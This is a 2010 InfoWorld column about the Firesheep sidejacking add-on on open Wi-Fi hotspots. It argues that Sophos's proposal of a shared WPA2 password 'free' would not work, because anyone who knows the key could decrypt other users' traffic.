November 10, 2010

'Sidejacking' browser add-on stumps security experts

Sophos offers novel approach to protecting open Wi-Fi hotspots from Firesheep snooping. Two problems: First, it won't work. Second, it won't work

By Woody Leonhard | InfoWorld



Last month security researcher Eric Butler released a simple browser add-on called Firesheep that makes it one-click easy to snoop on unprotected Wi-Fi connections. If you're using Wi-Fi and the router doesn't have a password, anybody with a laptop and Firesheep can watch everything you do. Worse, the person running Firesheep who's eavesdropping on your conversation can step into your shoes and start interacting with websites precisely the same way that you do.

The technique, known as sidejacking, involves a long-known hole in the way websites work.

There are three easy ways to thwart Firesheep and its sidejacking. First, if you're interacting with a secure website ("https"), Firesheep can't come in and watch. Second, if you're running a VPN, all of your Wi-Fi traffic is tunneled and, thus, hidden from snoopers. Third, you can set up an encrypted connection with your Wi-Fi router.

That revelation has led many security experts to suggest that people actually use the WPA2 encryption available on almost every modern wireless access point. We're not talking rocket sicence: Enable WPA2 on your router, give the key out only to people you want to use the router, and your wireless connection becomes several orders of magnitude more difficult to snoop. Firesheep doesn't stand a chance.

Unfortunately, some security experts don't understand the details and are doling out bad advice. Cue Chester Wisniewski, a senior security advisor at Sophos Canada. Yesterday Wisniewski posted an article entitled "Dear Starbucks: The skinny on how you can be a security hero" on the Sophos blog. Wisniewski noted that Starbucks, among a zillion others, has unencrypted Wi-Fi hotspots open to the public: If you want to use Wi-Fi at Starbucks, you simply connect to the router, no password required.

Firesheep loves those kinds of connections. Snooping them is absolutely trivial.

Wisniewski suggests that all of those open, unencrypted Wi-Fi hotspots should switch over to WPA2 encryption -- but all of the hotspots should use the same password.

I propose standard adoption of WPA2 and a default password of "free". Whenever you wish to connect to complimentary Wi-Fi, you select "Courtyard Marriott" or "Starbucks" like you always have, but you are then prompted for a password.

On the surface, that sounds like an interesting idea. But if you dig a bit, you'll wonder how that post ever made it onto Sophos's site.

Let's ignore for the moment the fact that "free" can't be a WPA2 password. The minimum key length for WPA2 is eight characters.

More to the point, if you can guess a Wi-Fi router's WPA2 key, snooping on all of the other people using the hotspot is straightforward. As far as I know, nobody's written a program that will provide Firesheep capability over a WPA2-protected network, but the steps for doing so are well-known. A Sophos blog participant who uses the handle Stephan puts it this way:

[W]hen everyone uses the same password, everyone will end up with the same key, which will be in intended use client and access point, but if someone else knows the password he will be able to come up with the same key.

Later on WPA2 uses this key derived from the password (called Pairwise Master Key, PMK) to negotiate new keys (called Pairwise Transient Key, PTK) to encrypt the actual payload, but if you're there while one of these PTKs get negotiated by use of the PMK, which will happen at the beginning of the session, and periodically during the session, then you will be able to tap this, and therefore also the whole conversation.

In short, putting WPA2 encryption on a wireless router only works if you limit the number of people who have access to the key. If the key becomes well-known -- "free" in this case -- you can throw your security out the window.

No matter what the experts say.